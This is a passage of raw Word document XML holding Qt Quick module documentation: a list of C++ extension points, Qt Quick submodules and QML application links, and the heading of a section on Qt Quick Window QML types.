          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1298" w:name="c-extension-points"/>
      <w:bookmarkStart w:id="1299" w:name="_Toc483000803"/>
      <w:bookmarkStart w:id="1300" w:name="_Toc483003801"/>
      <w:bookmarkStart w:id="1301" w:name="_Toc483604154"/>
      <w:bookmarkStart w:id="1302" w:name="_Toc483605374"/>
      <w:bookmarkEnd w:id="1298"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C++ Extension Points</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1299"/>
      <w:bookmarkEnd w:id="1300"/>
      <w:bookmarkEnd w:id="1301"/>
      <w:bookmarkEnd w:id="1302"/>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1582" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>C++ Extension Points</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1583" w:anchor="user-defined-qquickitem-derived-types" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creating User-Defined QQuickItem-Derived Types</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1584" w:anchor="scene-graph-related-classes" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Scene Graph-Related Classes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1585" w:anchor="pixmap-and-threaded-image-support" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Pixmap and Threaded Image Support</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1303" w:name="reference-documentation"/>
      <w:bookmarkStart w:id="1304" w:name="_Toc483604155"/>
      <w:bookmarkStart w:id="1305" w:name="_Toc483605375"/>
      <w:bookmarkEnd w:id="1303"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>Additional Qt Quick information:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1304"/>
      <w:bookmarkEnd w:id="1305"/>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1586" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick C++ Classes</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 the C++ API provided by the Qt Quick module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1587" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick QML Types</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 a list of QML types provided by the</w:t>
      </w:r>
      <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>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import</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1588" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XML List Model</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 contains types for creating models from XML data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1589" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Local Storage</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 a submodule containing a JavaScript interface for an</w:t>
      </w:r>
      <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1590" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQLite</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database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1591" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Particles</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 provides a particle system for Qt Quick</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1592" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layouts</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 provides layouts for arranging Qt Quick items</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1593" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Window</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 contains types for creating top-level windows and accessing screen information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1594" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dialogs</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 contains types for creating and interacting with system dialogs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1595" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Tests</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 contains types for writing unit test for a QML application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="003D1644" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1596" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt Quick Examples and Tutorials</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Further information for writing QML applications:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1597" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Applications</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 essential information for application development with QML and Qt Quick</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1598" w:history="1">
        <w:r w:rsidR="00C407A0" w:rsidRPr="003D1644">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00C407A0" w:rsidRPr="00C407A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- documentation for the Qt QML module, which provides the QML engine and language infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C407A0" w:rsidRPr="00C407A0" w:rsidRDefault="00C407A0" w:rsidP="00C407A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="1288"/>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://doc.qt.io/qt-5/qtquick-window-qmlmodule.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C72653">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://doc.qt.io/qt-5/qtquick-window-qmlmodule.html</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72653" w:rsidRPr="00C72653" w:rsidRDefault="00C72653" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1306" w:name="_Toc483000805"/>
      <w:bookmarkStart w:id="1307" w:name="_Toc483003803"/>
      <w:bookmarkStart w:id="1308" w:name="_Toc382058611"/>
      <w:bookmarkStart w:id="1309" w:name="_Toc483604156"/>
      <w:bookmarkStart w:id="1310" w:name="_Toc483605376"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Window QML Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1306"/>
      <w:bookmarkEnd w:id="1307"/>
      <w:bookmarkEnd w:id="1309"/>
      <w:bookmarkEnd w:id="1310"/>
    </w:p>
